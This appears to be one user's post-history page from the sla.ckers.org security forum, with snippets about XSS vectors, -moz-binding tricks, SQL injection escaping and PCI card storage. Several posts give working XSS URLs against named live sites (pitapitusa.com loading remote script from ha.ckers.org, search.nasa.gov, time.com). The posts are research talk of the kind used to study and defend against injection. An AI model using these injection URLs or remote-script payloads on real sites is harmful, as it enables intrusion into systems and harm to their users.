Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Who's got it? Who's giving it away? How to protect your privacy and steal it from other people. For intellectual privacy, personal privacy, and blackhats alike... 

Pages: 123Next
Current Page: 1 of 3
Results 1 - 30 of 66
5 years ago
yawnmoth
<?php header('Content-type: text/plain'); header('Content-Disposition: attachment; filename="plain.txt"'); echo $_GET['input'] ?> An automated scanner I've been playing around with identified that as a possible XSS exploit. I disagree with that assertion. Sure, maybe if you tell IE, via the download prompt, to open it in IE, maybe HTML can be rendered, but that's more
Forum: XSS Info
5 years ago
yawnmoth
<script> document.location.href = prompt('enter a URL',''); </script> An automated scanner I've been playing around with identified that as a possible XSS exploit and as an "open redirect". I disagree with both assertions. Sure, you could type in javascript:alert(1) into the prompt and get some javascript to run on the page but that's hardly XSS, imho, given that it re
Forum: XSS Info
5 years ago
yawnmoth
Just used Wireshark to confirm and... you're right. The XSS cheat sheet lists several Google "feeling lucky" things but I thought they had stopped working - guess they only stopped working in client side code.
Forum: XSS Info
5 years ago
yawnmoth
If you type www>digg>com into the Firefox address bar, you get sent to www.digg.com. <a href="www>digg>com">, however, does not do the same thing - nor does http://www>digg>com or <script>location = 'www>digg>com';</script>. Given the restrictions, this doesn't really seem useful for XSS, but maybe it is and I've just missed something?
Forum: XSS Info
5 years ago
yawnmoth
That really depends on the context. SELECT * FROM whatever WHERE id = x SQL injecting that doesn't require any characters that htmlspecialchars would escape. If you wanted to query someone by a username that had double quotes in it, you could do concat(char(...), char(...), ...) Also... SELECT * FROM whatever WHERE id = 'x' htmlspecialchars, by default, won't protect against that,
Forum: SQL and Code Injection
5 years ago
yawnmoth
Stefan Esser described the attack on his blog: http://www.suspekt.org/2008/08/18/mysql-and-sql-column-truncation-vulnerabilities/ > Because MySQL does not compare strings in binary mode by default more relaxed > comparison rules are used. One of these relaxations is that trailing space > characters are ignored during the comparison." My question is... what characters co
Forum: SQL and Code Injection
5 years ago
yawnmoth
http://www.time.com/time/searchresults?N=0&Ntk=NoBody&Nty=1&Nr=OR(1=1)&Ntt=zzz%27;a/**/setter//&x=15&y=12&srchCat=Full+Archive If you view the source and do a search within the source for 'zzz', you'll find it in some javascript. You can break out of the javascript with a single quote, but... if you try to include (, ), or =, then the javascript portion disappears.
Forum: XSS Info
5 years ago
yawnmoth
I just tried adding 'zzz' before the XML and it didn't work: http://www.frostjedi.com/terra/test.php If you have better luck, let me know! :)
Forum: XSS Info
5 years ago
yawnmoth
> cross-site -moz-binding support (including data: URLs from non chrome: origins) has been removed from final Firefox 3.0 release. source: http://hackademix.net/2007/12/25/merry-xssmas/#comment-9144 I asked about data url's for -moz-binding before: http://sla.ckers.org/forum/read.php?2,20939
Forum: XSS Info
5 years ago
yawnmoth
-moz-binding now requires the XML be hosted locally in order to work. Having a locally hosted file isn't, itself, a problem - lots of websites already let you upload stuff to them. My question is... is it possible to construct an image that is, simultaneously, valid XML, so that I might use it on such sites via -moz-binding? I tried appending some XML to an image, figuring that Firefox's X
Forum: XSS Info
5 years ago
yawnmoth
From the Posting tab in phpBB3's ACP: "{TEXT}: Any text, including foreign characters, numbers, etc… You should not use this token in HTML tags. Instead try to use IDENTIFIER or SIMPLETEXT." "{SIMPLETEXT}: Characters from the latin alphabet (A-Z), numbers, spaces, commas, dots, minus, plus, hyphen and underscore" "{IDENTIFIER}: Characters from the latin alphabet
Forum: XSS Info
6 years ago
yawnmoth
I'm trying to get this working, myself, and am having some difficulty: http://www.frostjedi.com/terra/scripts/demo/moz-binding.php Here's the source code to that file: <div style="-moz-binding: url(data:text/xml;charset=utf-8,<?php echo urlencode(utf8_encode('<?xml version="1.0"?> <bindings xmlns="http://www.mozilla.org/xbl"> <binding id
Forum: XSS Info
6 years ago
yawnmoth
Kyo Wrote: ------------------------------------------------------- > are you literally pasting that in there, with the > PHP unparsed? No. The PHP code is in a *.php file running on Apache with PHP5 running via CGI. You can view it here: http://www.frostjedi.com/terra/scripts/demo/moz-binding.php My question still stands. Why doesn't that page yield a javascript popup? I've t
Forum: XSS Info
6 years ago
yawnmoth
I'm trying to play around with the inline data url binding thing as described at http://sla.ckers.org/forum/read.php?2,20939 and am having some difficulty. Here's what I've got, thus far: <div style="-moz-binding: url(data:text/xml;charset=utf-8,<?php echo urlencode('<?xml version="1.0"?> <bindings xmlns="http://www.mozilla.org/xbl"> <binding
Forum: XSS Info
6 years ago
yawnmoth
Gareth Heyes Wrote: ------------------------------------------------------- > inline moz-binding dude > > OR/AND > > expressions in IE I was doing an inline moz-binding. Unless there's maybe a syntax error? It looks correct to me. And since I'm trying to get this working in FF, expressions are kinda out. Anyway, Kyo's suggestion worked, with modification: zz
Forum: XSS Info
6 years ago
yawnmoth
zz If you enter that into the Plain Text tab, when making a new post, click on the Preview tab, and then, in FF, highlight the "zz", right click, and then click on "View Selection Source" from the resultant menu, you'll see that the style attribute is being successfully added - the only thing is that FF3 doesn't, iirc, let you link to offsite *.xml's, anymore, with -moz-bind
Forum: XSS Info
6 years ago
yawnmoth
Heh. Didn't realize it was doing that! Anyway, this works: http://www.pitapitusa.com/main.php/%22%3E%3Cscript%20src=http:/%26%2347;ha.ckers.org/s.js%3E%3C/script%3E
Forum: XSS Info
6 years ago
yawnmoth
I'm trying to present a case for why having something like localhost.google.com actually point to localhost is a bad idea and am having some difficulty. If, on localhost, you have an XSS'able application, then you can do an XSS attack against, say, http://localhost.google.com/?a=<script>...</script> and steal cookies, send XmlHttpRequests with cookies, etc. The problem is... wha
Forum: XSS Info
6 years ago
yawnmoth
It seems to me like some of these vectors really ought to be mentioned in the XSS cheat sheet. Is that just not being maintained, anymore, or is there some other reason that these aren't being added to it? Maybe someone else should take it on? Kyo Wrote: ------------------------------------------------------- > I don't like to brag, but I'm a fucking genius :P > > http://wocar
Forum: XSS Info
6 years ago
yawnmoth
http://www.pitapitusa.com/main.php/%22%3E%3Cscript%20src=http://ha.ckers.org/s.js%3E%3C/script%3E If you view that link, directly, in either IE or FF, the whole "You Got Stallown3d!1" doesn't get displayed. If, however, you view the source, in either IE or FF, and then copy / paste it to a new file, it does get displayed? Any ideas as to what's happening?
Forum: XSS Info
6 years ago
yawnmoth
id Wrote: ------------------------------------------------------- > break the CC number into two parts, hash them > both, tada. ie. substring($credit_card_num, 0, -4) for the first part, and substring($credit_card_num, -4) for the last part? That does seem like a good approach :)
Forum: Privacy
6 years ago
yawnmoth
My first question is... does the PCI require retail stores store credit card numbers? http://www.darkreading.com/document.asp?doc_id=135602 suggests that they are. If so, what does the PCI say about storing them encrypted vs. storing them unencrypted? I can see virtue to both, actually. If you store credit card numbers encrypted or hashed, it's a lot harder for the database administrator
Forum: Privacy
6 years ago
yawnmoth
I think he did notice that line (hence his trying 0xbf27). I think the problem was with how he was trying to encode it. He tried to encode it, maybe, as %bf27 or %ubf27 as opposed to %bf%27. The Code Red worm used %ubf27 style urlencode()'ing, so it's not all that unreasonable to assume that it'd work here... Maybe that style of encoding only works on IIS? edit: removed url.
Forum: SQL and Code Injection
6 years ago
yawnmoth
tx Wrote: ------------------------------------------------------- > > > It's better because then they will have to face > their poor programming practices and (hopefully) > learn a little something. I agree that > magic_quotes mainly helps programmers who don't > really understand how it helps them, but I think > that when their application is attacked or > (
Forum: News and Links
6 years ago
yawnmoth
It seems to me that .NET's protection encourages lazy development, too. Why should I bother escaping a < by turning it into a &lt; when .NET will block the request for me? That might have the same portability issues as magic_quotes, as well. Also, just ftr, I never said magic quotes was effective at preventing XSS, heh. It can certainly obfusticate it, requiring you do /xss/.source as
Forum: News and Links
6 years ago
yawnmoth
According to wikipedia.org, " said he used the ip2location database that has "2,668,095 different organizations … which I am using to connect IP#'s to organization names. Within the IP2Location database, there are 187,529 different organizations with at least one anonymous Wikipedia edit."". My question is, how does ip2location http://www.ip2location.com/free.asp do it?
Forum: Networking
6 years ago
yawnmoth
It's interesting... .NET blocks requests that look like they might be XSS attacks, and it's praised, yet PHP's magic_quotes_gpc directive, which attempts to provide some protection against SQL injection (and, in my experience, often does), is widely criticized. Why is this? Would it be better if PHP spit out an 403 forbidden error when ' was used in a query, just as how .NET throws that o
Forum: News and Links
6 years ago
yawnmoth
From the FAQ: "Is this your own database, or a front end for someone else's services? The database is our own and was generated from scratch." How do you build a database like this in the first place? None of the *.gtld-servers.net (authoritative .com DNS) servers allow AXFR zone requests. The people at OpenDNS could probably build their own database by caching domains / IP addr
Forum: News and Links
6 years ago
yawnmoth
AVG Anti-Virus 8 added a new feature - LinkScanner [1] - that prefetches webpages. I've confirmed the fact that it downloads them and doesn't just check the domain name against a database as Firefox's anti-phishing feature works by using Wireshark. Given [2], this seems, quite simply, like a bad idea. Thankfully, AVG seems to include it's own client. The User-Agent string of the requests i
Forum: News and Links
6 years ago
yawnmoth
http://search.nasa.gov/search/search.jsp?nasaInclude=%22+onclick%3D%22e+setter%3Deval%2Cu+setter%3Dunescape%2Ce%3Du%3D%27%2561%256c%2565%2572%2574%2528%2527%2558%2553%2553%2527%2529%27&entqr=0&output=xml_no_dtd&sort=date%3AD%3AL%3Ad1&ud=1&site=nasa_collection&client=nasa_production&ie=UTF-8&oe=UTF-8&simple_start=&news_start=&images_start=&videos_star
Forum: XSS Info
Pages: 123Next
Current Page: 1 of 3